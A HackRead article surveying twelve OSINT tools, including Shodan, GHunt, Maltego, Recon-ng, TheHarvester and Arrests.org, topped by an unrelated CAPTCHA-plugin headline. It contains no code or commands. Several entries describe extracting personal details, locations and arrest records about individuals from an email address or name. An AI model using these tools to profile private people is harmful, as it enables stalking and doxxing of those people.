5 Best CAPTCHA Plugins for WordPress Websites

By Waqas
In this article, we will explore 12 paid and free OSINT tools that are publicly available and can be very useful when utilized properly and for appropriate purposes.
This is a post from HackRead.com Read the original post: Best Paid and Free OSINT Tools for 2024

Open Source Intelligence tools (or OSINT tools) are software applications or platforms used to collect, analyze, and interpret publicly available information from various online sources, aiding in investigations, research, and intelligence gathering.

These OSINT Tools assist in accessing and analyzing data from sources such as social media, websites, forums, and other public repositories to generate insights and support decision-making processes.

In this article, we will explore 12 paid and free OSINT tools that are publicly available and can be very useful when utilized properly and for appropriate purposes.

****1:** EpicVIN**

EpicVIN is a website dedicated to providing detailed vehicle history reports based on a vehicle’s VIN (Vehicle Identification Number) or license plate number. Established in 2012 and headquartered in Miami, Florida; the platform offers paid results with three packages starting from $14.99 for 1 report, $7.04 for 4 reports and $5.4 for 16 reports.

****2: Shodan****

Shodan is essentially a search engine for Internet-connected devices. It allows users to discover various types of devices, from routers to security cameras to servers, that are connected to the internet, providing valuable data about the security of these devices and potential vulnerabilities.

Shodan is available in free and paid packages.

****3: Telegogo****

Telegogo is a free Google-based search engine for Telegram. The tool can be used to search for public Telegram channels, groups, or content. Leveraging Google’s search capabilities helps users find Telegram-related information or discussions more efficiently than searching through Telegram’s own search features.

Telegogo is useful for anyone looking to explore public conversations or communities within Telegram around specific topics, making the platform’s vast amount of user-generated content more accessible and navigable. If you are looking for specific types of Telegram groups or channels, using a dedicated search tool like Telegogo could significantly streamline your search process.

****4\. GHunt****

GHunt is a free OSINT tool designed to extract information from any Google Account using an email address. The data that GHunt can gather includes:

*   Google ID
*   Owner’s name
*   Public photos (P)
*   Phones models (P)
*   Phones firmware
*   Installed Softwares
*   Google Maps reviews
*   Possible physical location
*   Possible YouTube channel
*   Possible other usernames
*   Events from Google Calendar
*   If the account is a Hangouts Bot
*   Last time the profile was edited
*   Activated Google services (YouTube, Photos, Maps, News360, Hangouts, etc.)

****5\. FOCA****

FOCA (Fingerprinting Organizations with Collected Archives) is a free OSINT tool used primarily for security auditing. It is designed to help security professionals analyze a domain’s security by finding metadata and hidden information in the documents they make available on their websites.

FOCA is popular among penetration testers and cybersecurity professionals for its ability to uncover information that can help in the early stages of a security audit or penetration test. It provides insights that can guide further testing and exploration including document analysis, metadata extraction, mapping and more.

****6\. SkopeNow****

Skopenow is a paid analytical search engine aimed at discovering and compiling digital identities from publicly available data. The platform uses various algorithms to aggregate information from social media, websites, and other online sources to create profiles that can be used for background checks, investigative purposes, and risk assessment. This can be particularly useful for professionals in law enforcement, fraud prevention, and corporate security to obtain insights into individuals’ online presence and behaviours.

****7\. Maltego****

Maltego is a powerful tool for performing real-time data mining and information gathering, as well as the visualization of this information in a graph format. Ideal for investigative purposes, it helps in identifying relationships and real-world links between pieces of information from various sources located on the Internet.

Maltego is available in free and paid packages.

****8\. Metagoofil****

Metagoofil is a metadata extraction tool that is used to analyze metadata of public documents (pdf, doc, xls, ppt, etc.) and to extract information that can be useful in an OSINT investigation. This tool can be used to gather data about the documents’ authors, creation dates, software used, and more.

****9\. Recon-ng****

Recon-ng is a full-featured free Web Reconnaissance framework written in Python. It provides a powerful environment in which open-source web-based reconnaissance can be conducted quickly and thoroughly. Recon-ng has a look and feels similar to the Metasploit Framework, reducing the learning curve significantly.

****10\. TheHarvester****

TheHarvester is a free OSINT tool for gathering e-mail accounts, subdomain names, virtual hosts, open ports/ banners, and employee names from different public sources (search engines, key servers). This tool is particularly useful in the early stages of a penetration test to understand the human element of cybersecurity.

****11\. Arrests.org****

Arrests.org is a free website aggregating booking and arrest records from various public law enforcement agencies across the United States. The site typically displays mugshots, personal information such as age and gender, and details of the charges against the individuals listed. These records are pulled from publicly available sources, such as county sheriff’s offices and police departments.

Therefore, this site can serve as a perfect OSINT tool for researchers, journalists, security professionals, and the general public seeking intelligence or information about individuals’ arrest histories. Additionally, the accessibility and range of data available on Arrests.org make it a useful tool for conducting background checks, investigating criminal activity, or monitoring crime trends, all of which are key aspects of OSINT research

****12\. OSINT Framework****

OSINT Framework is not a tool in itself, but rather a free collection of OSINT tools that can be used for specific purposes. It organizes tools based on the type of data you are interested in and the goal of your investigation, making it an invaluable resource for anyone conducting OSINT.

1.  New tool detects fake 4G cell phone towers
2.  8 Online Best Dark Web Search Engines for Tor Browser
3.  What Are Dark Web Search Engines and How to Find Them?
4.  New tool lets teens report, remove their nude photos online
5.  CISA Publishes List of Free Cybersecurity Tools and Services
6.  Building Your Defense Toolbox: Tools to Combat Cyber Threats
7.  Temporary Phone Number: An Essential Tool for Privacy Protection

Tag

#google